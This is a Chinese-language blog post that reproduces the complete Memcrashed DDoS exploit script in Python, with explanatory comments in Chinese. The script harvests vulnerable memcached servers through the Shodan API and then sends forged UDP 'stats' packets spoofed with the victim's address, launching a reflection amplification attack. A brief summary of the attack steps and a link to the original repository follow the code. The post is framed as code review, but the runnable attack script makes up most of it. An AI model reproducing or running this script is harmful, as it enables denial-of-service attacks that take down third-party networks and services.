0x00前言:

距离世界上最大的Drdos攻击已经过去了两个星期左右

昨天在交流的时候。群友在Github中找到了exploit。

0x01开始:

#-- coding: utf8 --

#!/usr/bin/env python3

import sys, os, time, shodan #导入sys,shodan,os,time模块

from pathlib import Path #从pathlib模块中导入Path

from scapy.all import * #导入scapy

from contextlib import contextmanager, redirect_stdout #从contextlib模块中导入 contextmanager, redirect_stdout

starttime = time.time() #设置时间点

@contextmanager

def suppress_stdout():

    with open(os.devnull, "w") as devnull: #不同设备下的null路径

        with redirect_stdout(devnull):

            yield 

class color:

    HEADER = '\033[0m' #背景颜色字符串

keys = Path("./api.txt") #搜索API.txt

logo = color.HEADER + ''' #好看的标题

   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗

   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗

   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║

   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║

   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝

   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝

                                        Author: @037

                                        Version: 3.2

####################################### DISCLAIMER ########################################

| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |

| memcached servers. It then allows you to use the same servers to launch widespread      |

| distributed denial of service attacks by forging UDP packets sourced to your victim.    |

| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |

| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |

| I am NOT responsible for any damages caused or any crimes committed by using this tool. |

###########################################################################################

'''

print(logo) #输出好看的标题 = =

if keys.is_file(): #如果路径下有这个文件的话

    with open('api.txt', 'r') as file: #读取API.txt

        SHODAN_API_KEY=file.readline().rstrip('\n') #每行读取删除换行符

else: #如果没有这个文件

    file = open('api.txt', 'w') #新建API.txt

    SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') #等待用户输入

    file.write(SHODAN_API_KEY) #写入用户输入的东西

    print('[~] File written: ./api.txt') #这个就不说了 = =

    file.close() #关闭文件

while True:

    api = shodan.Shodan(SHODAN_API_KEY) #你的shodan Key

    print('') #= =

    try:

        myresults = Path("./bots.txt") #搜索bots.txt

        query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower() #等待用户输入,将输入转化为小写

        if query.startswith('y'): #如果用户输入的是y

            print('')

            print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)

            results = api.search('product:"Memcached" port:11211') #从shodan中搜索Memcached服务,并且端口是11211的

            print('[✓] API Key Authentication: SUCCESS')

            print('[~] Number of bots: %s' % results['total'])

            print('')

            saveresult = input("[*] Save results for later usage? <Y/n>: ").lower() #等待用户输入,将输入转化为小写

            if saveresult.startswith('y'): #如果是y

                file2 = open('bots.txt', 'a') #打开bots.txt

                for result in results['matches']: #变量shodan搜索到的结果

                    file2.write(result['ip_str'] + "\n") #将搜索到的IP写入bots.txt

                print('[~] File written: ./bots.txt')

                print('')

                file2.close() #关闭文件

        saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower() #等待用户输入将输入的转为小写

        if myresults.is_file(): #如果路径下有bots.txt

            if saveme.startswith('y'): #用户输入为y

                with open('bots.txt') as my_file: #读取bots.txt

                    ip_array = [line.rstrip() for line in my_file] #读取IP

        else: #如果路径下没有这个txt

            print('')

            print('[✘] Error: No bots stored locally, bots.txt file not found!')

            print('')

        if saveme.startswith('y') or query.startswith('y'): #两个任意一个为y的话

            print('')

            target = input("[▸] Enter target IP address: ") #等待用户输入

            power = int(input("[▸] Enter preferred power (Default 1): ") or "1")

            data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"

            print('')

            if query.startswith('y'): #如果输入为y的话

                iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower() #等待输入

                if iplist.startswith('y'): #输入为y的话

                    print('')

                    counter= int(0)

                    for result in results['matches']: #遍历shodan搜索的结果

                        host = api.host('%s' % result['ip_str']) #输入IP

                        counter=counter+1

                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))

                        time.sleep(1.1 - ((time.time() - starttime) % 1.1))

            if saveme.startswith('y'): #为y的话

                iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower() #等待输入

                if iplistlocal.startswith('y'): #输入为y的话

                    print('')

                    counter= int(0)

                    for x in ip_array:

                        host = api.host('%s' % x)

                        counter=counter+1

                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))

                        time.sleep(1.1 - ((time.time() - starttime) % 1.1)) #延迟一秒钟,并减去开始的时间

            print('')

            engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower() #等待用户输入

            if engage.startswith('y'): #如果为y

                if saveme.startswith('y'): #如果为y

                    for i in ip_array: #遍历ip_array

                        if power>1: #如果power大于1

                            print('[+] Sending %d forged UDP packets to: %s' % (power, i))

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)

                        elif power==1:#如果power等于1

                            print('[+] Sending 1 forged UDP packet to: %s' % i)

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP向Memcrashed发送数据

                else: #如果两个都不是

                    for result in results['matches']:

                        if power>1: #如果power大于1

                            print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据

                        elif power==1: #如果power等于1

                            print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据

                print('')

                print('[•] Task complete! Exiting Platform. Have a wonderful day.')

                break

            else:

                print('')

                print('[✘] Error: %s not engaged!' % target)

                print('[~] Restarting Platform! Please wait.')

                print('')

        else:

            print('')

            print('[✘] Error: No bots stored locally or remotely on Shodan!')

            print('[~] Restarting Platform! Please wait.')

            print('')

    except shodan.APIError as e:

            print('[✘] Error: %s' % e)

            option = input('[*] Would you like to change API Key? <Y/n>: ').lower() #等待输入

            if option.startswith('y'): #如果为y

                file = open('api.txt', 'w') #新建api.txt

                SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ') #输入您的shodan可以

                file.write(SHODAN_API_KEY) #加入到文件

                print('[~] File written: ./api.txt')

                file.close() #关闭文件

                print('[~] Restarting Platform! Please wait.')

                print('')

            else: #如果不是

                print('')

                print('[•] Exiting Platform. Have a wonderful day.')

                break

向Memcrashed发送的数据: \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

Memcrashed exploit地址:https://github.com/649/Memcrashed-DDoS-Exploit

0x02分析完代码获取到的思路:

1.从shodan中获取开放了11211的Memcrashed的服务的IP

2.遍历shodana获取到的IP写入到文件

3.遍历写人IP的文件

4.伪造源IP向遍历的IP发送数据:\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

审核Memcrashed Drdos攻击代码的更多相关文章

  1. 关于Memcached反射型DRDoS攻击分析

    一.Memcached反射攻击原理 1.反射DRDoS攻击: DRDoS攻击时DoS攻击的一种,DoS是指通过发送或引发大量的资源消耗导致服务不可用的一种攻击方式,中文称之为拒绝服务攻击.DRDoS是 ...

  2. 判断字符串中是否有SQL攻击代码

    判断一个输入框中是否有SQL攻击代码 public const string SQLSTR2 = @"exec|cast|convert|set|insert|select|delete|u ...

  3. PHP防CC攻击代码

    PHP防CC攻击代码: empty($_SERVER['HTTP_VIA']) or exit('Access Denied'); //代理IP直接退出 session_start(); $secon ...

  4. ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl 漏洞及攻击代码分析

    攻击代码网址:http://www.exploit-db.com/exploits/394/ 1.执行环境: 1.ProFTPD 1.3.0/1.3.0a 2.编译ProFTPD时.--enable- ...

  5. DOS、DOS攻击、DDOS攻击、DRDOS攻击

    https://baike.baidu.com/item/dos%E6%94%BB%E5%87%BB/3792374?fr=aladdin DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称 ...

  6. 常见的XSS攻击代码

    第一类: <tag on*=*/> 在html标签事件中触发,典型的是on*事件,但是这种触发模式的缺陷在于不能直接触发所以更多的需要配合使用. eg: 1.使html元素占据整个显示页面 ...

  7. mysql相关攻击代码收集

    1.批处理文件内容 @echo off net user li /add net user li /active:yes net localgroup Administrators li /add 2 ...

  8. php--防止DDos攻击代码

    <?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fil ...

  9. PHP攻击网站防御代码-以及攻击代码反译

    <?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fil ...

随机推荐

  1. Spring Boot : Whitelabel Error Page解决方案

    楼主最近爱上了一个新框架--Spring Boot, 搭建快还不用写一堆xml,最重要的是自带Tomcat 真是好 pom.xml <?xml version="1.0" e ...

  2. Spring context:property-placeholder 一些坑

    今天在配置多配置文件的时候偶然发现如果我使用   <context:property-placeholder location="classpath:filePath.properti ...

  3. Js比较对Object类型进行排序

    <script> var data=[{name:"121",age:"18",year:"2018"},{name:" ...

  4. LINUX signal 信号

    body, table{font-family: 微软雅黑; font-size: 10pt} table{border-collapse: collapse; border: solid gray; ...

  5. a标签文字选中后的颜色样式更改

    ::selection 选择器,选择被用户选取的元素部分.是css3的用法,讲真,我觉得这个东西没必要特地去写.因为选中样式默认的会根据你的背景颜色还有字体color来设置颜色 这是我默认的样式

  6. Hi3531 SDK 安装以及升级使用说明

    Hi3531 SDK 安装以及升级使用说明 第一章 Hi3531_SDK_Vx.x.x.x版本升级操作说明    如果您是首次安装本SDK,请直接参看第2章.     第二章 首次安装SDK 1.Hi ...

  7. SSH2三大框架SQL查询

    /** * 查询省份名称 * @author YHD * @return * @see */ @SuppressWarnings("unchecked") @Override pu ...

  8. 蜻蜓FM 涉嫌诈骗投资人和广告主源代码剖析

    本文主要内容,引用自知乎的这篇文章:如何评价蜻蜓 FM 伪造用户活跃度等数据 感谢"左莫"."任正"等热心正义的网友--左莫,任正的最早的回答猜测已经被蜻蜓FM ...

  9. configure: error: xml2-config not found. Please check your libxml2 installation

    安装php时的报错 checking libxml2 install dir... nochecking for xml2-config path... configure: error: xml2- ...

  10. HighCharts中的无主题的2D折线图

    HighCharts中的无主题的2D折线图 1.设计源码 <!DOCTYPE html> <html> <head> <meta charset=" ...